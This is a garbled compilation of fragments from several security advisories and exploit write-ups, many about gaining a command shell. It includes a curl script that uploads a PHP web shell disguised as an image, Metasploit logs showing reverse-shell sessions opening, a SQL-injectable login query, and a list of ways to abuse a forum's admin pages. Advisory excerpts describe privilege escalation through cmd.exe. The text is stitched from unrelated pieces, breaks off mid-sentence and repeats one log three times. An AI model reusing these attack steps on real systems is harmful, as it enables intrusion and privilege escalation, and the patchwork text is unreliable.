Command shell
"user=hacker&pass=31337&email=foo%40bar.com&company_name=&first_name=Hack&last_name=Errr&phone=123+123+1234&alt_phone=&fax=&country=1&state=Badakhshan&city=&address=&zip=&submit=Submit&agree=agree"
"$target/register.php" >/dev/null 2>&1
echo "Login"
curl -b cookiejar -c cookiejar -d "user=hacker&pass=31337&submit=Login"
"$target/login.php" >/dev/null 2>&1
echo "Upload command shell as user image"
curl -b cookiejar -c cookiejar -F "image=@evilimage.jpg.php" -F
"max=524288" -F "addimage=Submit" "$target/useredit.php" >/dev/null 2>&1
CODE=`curl -b cookiejar -c cookiejar "$target/member.php" 2>/dev/null |
grep _thumb.jpg | egrep -o "[0-9]{4}"`
> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
> [*] Bound to
> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
> [*] Calling the vulnerable function...
> [+] Server did not respond, this is expected
> [*] Command shell session 1 opened (192.168.50.201:33694 ->
> 192.168.50.10:4444)
> msf exploit(lsa_transnames_heap) > sessions -i 1
> [*] Starting interaction with 1...
>
> uname -a
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Bound to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.50.201:33694 ->
192.168.50.10:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...
uname -a
MD5: B5402A1EC8D04130304EBA89AF843916
The service provides functionality for any user to generate a diagnostic
report in order to aid in product troubleshooting. During report
generation, STEngine attempts to execute various scripts by spawning
command shells to gather system information. These scripts are
dynamically generated in a directory which all users may write to.
STEngine will also attempt to locate a command shell in this directory
and execute it if it is found. If a malicious local user places a
binary named "cmd.exe" in this directory, STEngine will execute it with
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Bound to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.50.201:33694 ->
192.168.50.10:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...
uname -a
(e.g. Wireless Assistant, Help and Support Center, ...)
The first problem is that the path variable passed as an argument to the LaunchApp() method
doesn't distinguish between global disk area and local HP software area.
Therefore using this method, one is able to launch ANY executable binary within the system
within the logged user context.
Combining this method with the system command shell one can execute any shell command sequence
within the remote user context(e.g. format, del, copy ...) providing '/c' switch as a first parameter
for the cmd.exe ("execute and exit" option).
At this point, owning the shell commands execution access, CreateProcess() win32 Api function access
and access to the system directory, we can construct an armed remote code execution exploit.
PulseAudio binary. After this it can execute this binary through the
hard link. At this moment /proc/sef/exe will point to the hard link.
Before PulseAudio is restarted, the attacker can replace the hard link
with a different (executable) file or (symbolic) link. If PulseAudio is
restarted, it will use a path name that at this moment points to a
different file, for example a command shell. Root privileges are not
dropped when PulseAudio is reloading, thus allowing a local attacker to
gain root privileges.
Please note, this attack is only possible if the attacker can create
hard links on the same hard disk partition on which PulseAudio is
$query = "SELECT * FROM admin_users WHERE email = '$email' AND password = '$password'";
Other Avenues for Attack:
-------------------------
++ Turn on file attachments via /ubbthreads/admin/editconfig.php?Cat= and then upload a php command shell as an attachment to a post ;)
++ Query MySQL database via /ubbthreads/admin/dbcommand.php?Cat=
++ Get MySQL username/password (it is plaintext) - view HTML Source of /ubbthreads/admin/editconfig.php?Cat=
PR_ATTACH_LONG_PATHNAME MAPI property.
Setting PR_ATTACH_PATHNAME to cmd.exe causes Outlook to search the PATH
environment variable for an executable named cmd.exe. If such a file is
found, this file will be executed. Normally this will result in a
command shell. The path name can be set to anything that is supported by
Windows, including UNC names (i.e.
\\servername\sharename\executable.exe) but also URLs (i.e.
http://www.akitasecurity.nl/advisory/RunCalc.exe). For URLs, Outlook
will open the default web browser. For other types of URIs, the
registered protocol handler determines how the supplied URI is opened
CiscoWorks IPM is a troubleshooting application that gauges network
response time and availability. It is available as a component within
the CiscoWorks LAN Management Solution (LMS) bundle. IPM version 2.6
for Solaris and Windows contains a process that causes a command
shell to automatically be bound to a randomly selected TCP port.
Remote, unauthenticated users are able to connect to the open port
and execute arbitrary commands with casuser privileges on Solaris
systems and with SYSTEM privileges on Windows systems. This
vulnerability is documented in CVE-2008-1157 and Cisco Bug ID
CSCsj06260.
dropped when accessing the GSC properties from the System Tray applet.
The vulnerability can be exploited by right-clicking the System Tray
icon, choosing "Log", right click "Event Viewer", "Open Log File...".
The opened file selected can be abused by navigating to C:\WINDOWS
\SYSTEM32\, right-clicking cmd.exe, then selecting "Open"; doing so
spawns a command shell with SYSTEM privileges.
Proof of concept:
-----------------
msf exploit(accellion_fta_mpipe2) > set RHOST 192.168.198.151
msf exploit(accellion_fta_mpipe2) > exploit
[*] Started reverse handler on 192.168.198.135:4444
[*] Command shell session 1 opened (192.168.198.135:4444 ->
192.168.198.151:42239) at 2010-11-15 23:50:35 -0600
id
uid=520(soggycat) gid=99(nobody) groups=99(nobody)
|
